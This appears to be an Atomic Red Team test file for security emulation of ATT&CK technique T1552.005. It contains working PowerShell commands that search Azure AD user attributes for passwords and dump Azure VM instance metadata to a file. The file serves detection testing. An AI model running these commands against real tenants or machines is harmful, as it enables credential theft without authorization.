Josh Rickard
a5dd0813cd
* fix: Updating atomics YAML file structure to align with the new JSON schema definition. This also fixes some white space issues and general line formatting across all impacted atomics. * fix: One additional change needed --------- Co-authored-by: MSAdministrator <MSAdministrator@users.noreply.github.com> Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
65 lines
3.0 KiB
YAML
65 lines
3.0 KiB
YAML
attack_technique: T1552.005
|
|
display_name: 'Unsecured Credentials: Cloud Instance Metadata API'
|
|
atomic_tests:
|
|
- name: Azure - Search Azure AD User Attributes for Passwords
|
|
auto_generated_guid: ae9b2e3e-efa1-4483-86e2-fae529ab9fb6
|
|
description: |
|
|
This test uses the MSOnline Powershell module to retrieve all user attributes for a specified account, which can sometimes contain unsecured credentials.
|
|
Upon successful execution, this test will scan all user attributes for any strings containing "password".
|
|
Those unsecured credentials will be output to a text file, as well as the account that they are associated with and the user attribute in which they were found.
|
|
See: https://github.com/dafthack/CloudPentestCheatsheets/blob/master/cheatsheets/Azure.md
|
|
supported_platforms:
|
|
- azure-ad
|
|
input_arguments:
|
|
username:
|
|
description: Azure AD username
|
|
type: string
|
|
default:
|
|
password:
|
|
description: Azure AD password
|
|
type: string
|
|
default: T1082Az
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
The MSOnline module must be installed.
|
|
prereq_command: |
|
|
if (get-command Get-MsolUser -erroraction silentlycontinue){exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
install-module MSOnline
|
|
executor:
|
|
command: |
|
|
import-module msonline
|
|
$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
|
|
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
|
|
Connect-MsolService -Credential $Credential
|
|
$users = Get-MsolUser -All;
|
|
foreach($user in $users)
|
|
{$props = @();$user | Get-Member | foreach-object{$props+=$_.Name};
|
|
foreach($prop in $props)
|
|
{if($user.$prop -like "*password*")
|
|
{("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop) | out-file -filepath $env:temp\T1552.005Test1.txt -append -force}}}
|
|
get-content -path $env:temp\T1552.005Test1.txt -erroraction silentlycontinue
|
|
cleanup_command: |
|
|
remove-item $env:temp\T1552.005Test1.txt -force -erroraction silentlycontinue
|
|
name: powershell
|
|
elevation_required: true
|
|
- name: Azure - Dump Azure Instance Metadata from Virtual Machines
|
|
auto_generated_guid: cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7
|
|
description: |
|
|
This test invokes a web request to the default Instance Metadata API of 169.254.169.254 in order to dump the data contained within it to a file.
|
|
See: https://www.sans.org/blog/cloud-instance-metadata-services-imds-/
|
|
supported_platforms:
|
|
- iaas:azure
|
|
input_arguments:
|
|
output_file:
|
|
description: File to output metadata to
|
|
type: string
|
|
default: $env:temp\T1552.005Test2.txt
|
|
executor:
|
|
command: |
|
|
Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | ConvertTo-Json -Depth 64 > #{output_file}
|
|
cleanup_command: |
|
|
remove-item #{output_file} -force -erroraction silentlycontinue
|
|
name: powershell
|